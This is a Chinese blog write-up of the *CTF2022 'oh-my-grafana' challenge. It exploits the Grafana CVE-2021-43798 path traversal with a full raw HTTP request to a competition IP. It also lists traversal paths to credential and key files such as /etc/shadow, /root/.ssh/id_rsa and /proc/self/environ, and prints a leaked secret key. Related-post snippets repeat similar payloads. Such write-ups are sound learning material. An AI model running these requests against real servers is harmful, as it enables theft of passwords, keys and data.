*CTF2022 oh-my-grafana

已于 2022-04-20 09:38:02 修改
阅读量3.6k 收藏 2
点赞数
分类专栏: 比赛wp 文章标签: CTF Web
于 2022-04-19 10:10:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/124244825
版权
本文详细介绍了Grafana的CVE-2021-43798漏洞,该漏洞允许未经授权的任意文件读取。通过POC,作者展示了如何读取系统敏感信息,如/etc/passwd和配置文件。通过对比全局和默认配置文件,揭示了admin密码,从而成功登录。此外,还探讨了利用该漏洞获取MySQL数据库信息的可能性。
摘要由CSDN通过智能技术生成

*CTF2022 oh-my-grafana

文章目录

CVE-2021-43798

版本号为8.2.6,存在任意文件读取漏洞,CVE-2021-43798
Grafana 未经授权的任意文件读取漏洞复现

可以打通,用这个poc

GET /public/plugins/welcome/../../../../../../../../../etc/passwd HTTP/1.1
Host: 124.71.184.1:3000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.39
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: redirect_to=%2Fpublic%2Fplugins%2Fwelcome%2F
Connection: close

可以进行任意文件读

在这里插入图片描述

读文件

/public/plugins/welcome/../../../../../../../../../var/lib/grafana/grafana.db
/public/plugins/welcome/../../../../../../../../../etc/grafana/grafana.ini HTTP
获得
;secret_key = SW2YcwTIb9zpOOhoPsMm

这里的思路当时走偏了一段时间,想着看数据库,然后把grafana.db这玩意给dump下来了,分析,(无果)
在这里插入图片描述

后来换思路,看服务端的其他文件可用的信息,找到如下文件的路径

/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/grafana/provisioning
/etc/init.d/grafana-server
/etc/passwd
/etc/shadow
/etc/default/grafana-server
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/var/lib/grafana/data/log/grafana.log
/var/lib/grafana
/var/lib/grafana/plugins
/var/log/grafana
/var/log/grafana/grafana.log
/var/cache/yum/grafana
/usr/share/grafana  
/usr/share/grafana/conf/defaults.ini
/usr/share/grafana/public/app/plugins/datasource/grafana
/usr/sbin/grafana-server
/proc/net/fib_trie
/proc/net/tcp
/proc/self/maps
/proc/self/cgroup
/proc/self/environ
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie
/proc/self/cmdline
/public/plugins/alertGroups/../../../../../../../../etc/passwd
/tmp/grafana.sock

注意查看配置文件,注意:两个配置文件,一个全局的,一个默认的

在这里插入图片描述

然后使用WinMerge对比全局配置文件和默认配置文件(有点多余了,可以直接看的),发现admin的密码

在这里插入图片描述

然后就可以登录了

mysql读取信息

整个mysql,参数具体还是看的配置文件
在这里插入图片描述
配置
在这里插入图片描述

然后explore,查询数据库里的信息

在这里插入图片描述

Sk1y
关注
专栏目录
*ctf2022-web-oh-my-grafana
qq_43200143的博客
04-19 3607
*ctf2022-web-oh-my-grafana 学到的东西 1.fuzz ,自动化fuzz可能存在的文件,这个需要自己积累,以及提前准备好!包括工具和字典. 2.漏洞库的准备,开始时可以进行快速搜索 对于一些针对开源的软件或者有安装包的,可以自己搭建本地环境,来查看可能存在的漏洞 题目一上来是一个grafana的登陆页面,这个之前有接触过,这个应用存在漏洞. 点击forget password后可以看到,下面给到了版本 在进行一番信息收集后,通过searchsploit和搜索引擎搜索,发现存在一个
【*CTFoh-my-grafana
aoao331198的博客
04-17 1830
Grafana任意文件读取漏洞(CVE-2021-43798) 有空另一个blog里复现一波,这里直接写wp /public/plugins/alertlist/…/…/…/…/…/…/…/…/…/…/…/etc/grafana/grafana.ini 查看配置文件 在配置文件里面可以找到admin的默认密码 成功登录进去后,尝试根据配置文件中的数据库信息登录数据库 然后在explore中可以得到flag ...
grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】--拿flag的历程
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-26 1万+
漏洞名称: grafana 目录遍历 (CVE-2021-43798) 漏洞描述: Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7...
grafana原始配置(运行成功)和对应docker成功日志
Allen技术小站
06-30 2252
##################### Grafana Configuration Example ##################### # # Everything has defaults so you only need to uncomment things you want to # change # possible values : production, develo...
Grafana 未经授权任意访问漏洞(CVE-2022-32275)
murphysec的博客
06-08 9813
CVE-2022-32275漏洞是由于Grafana存在未授权访问漏洞,攻击者可以通过特定url,访问任意用户系统界面及读取任意文件。该漏洞影响范围一般。该问题已在新版本中修复,建议用户更新到最新版本。参考链接:https://nvd.nist.gov/vuln/detail/CVE-2022-32275 MISC:https://github.com/BrotherOfJhonny/grafana/blob/main/README.md       【使用墨菲安全的开源工具帮您快速检测代码安全】 墨菲安全
ctf-all-in-one
01-30
ctf-all-in-one
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
开源漏洞深度分析|CVE-2022-38370 Apache IoTDB grafana-connector 模块未授权漏洞
LJQClqjc的博客
09-08 1000
开源漏洞深度分析|CVE-2022-38370 Apache IoTDB grafana-connector 模块未授权漏洞
*CTF 2022web(CVE-2021-43798)
……
09-04 1477
CVE-2021-43798漏洞复现 *CTF 2022web
【漏洞复现】Grafana任意文件读取漏洞(CVE-2021-43798)
热门推荐
qq_45244158的博客
12-09 1万+
Grafana 任意文件读取漏洞复现(CVE-2021-43798)
*CTF2022 - Web
weixin_51804748的博客
04-17 3012
oh-my-grafana Grafana是一款用Go语言开发的开源数据可视化工具,可以做数据监控和数据统计,带有告警功能。 本题使用的Grafana版本为8.2.6,存在任意文件读取的漏洞(CVE-2021-43798) 由于本题需要登录,首先考虑能不能读取到grafana.ini,获取用户名和密码 在ini文件中搜索得到admin的用户名和密码,成功登录 [security] # disable creation of admin user on first start of grafana ;di
Grafana任意文件读取漏洞(CVE-2021-43798)
不光要学,知识要能说出口
12-08 992
Grafana任意文件读取漏洞(CVE-2021-43798) goby exp声明代码poc集合 声明 本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 代码 { "Name": "Grafana Plugins Arbitrary File Read CVE-2021-43798", "Level": "3", "Tags": [ "fileread" ],
部署prometheus
ctf059的博客
05-04 503
部署prometheus Prometheus介绍 Prometheus是SoundCloud开发的一个监视系统和时间序列数据库,开源。 K8S搭配Prometheus进行监控,google BorgMon监控开源 prometheus的主要特点 1.自定义多维数据模型 2.非常高效的存储,平均一个采样数据占~3.5bytes左右 3.在多维度上灵活且强大的查询语言(PromQI) 4.不依赖分布式存储,支持单主节点工作通过基于HTTP的pull方式采集时序数据,可通过push gateway进行时序列数据
CVE-2021-43798 Grafana 未授权任意文件读取漏洞
dreamthe的博客
12-08 6563
1.漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 该漏洞危害等级:高危 2.FOFA 查询 app="Grafana" 3.影响范围 根据FOFA最新数据,使用数量前三分别是:美国(67057),中国(30812),德国(25397) 经测试,目前最新版本(Grafana v8.2
[2022-* CTF]-WEB
qq_53142368的博客
06-07 568
这次比赛体验也还行,题目质量出的很高,把wp记录下来 WEBoh-my-grafana 这个题目考的是grafana任意文件读取漏洞(CVE-2021-43798) 2021年12月6日,国外安全研究人员检测出grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。 读取敏感文件复现poc: /public/plugins/alertlist/../../../../../../../../etc/passwd /public/plugins/alertli
Prometheus+Grafana概述
afei001
06-11 295
目录 1.Prometheus概述 2.Prometheus架构图解 (1)Prometheus Server (2)Exporters (3)AlertManager (4)PushGateway (5)Prometheus web UI 3.Prometheus工作流程 4.Prometheus特点 5.Grafana概述 1.Prometheus概述 Prometheus(普罗米修斯)是一套开源的监控、报警、时间序列数据库的组合,起始是由SoundClou...
ctf任务http-get
最新发布
06-27
CTF(Capture The Flag)是一种网络安全竞赛活动,通常包含各种挑战,其中HTTP-GET任务是一种常见的Web安全方面的挑战。在这样的任务中,参与者需要利用HTTP协议的GET方法来获取隐藏的信息或解决某个谜题。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值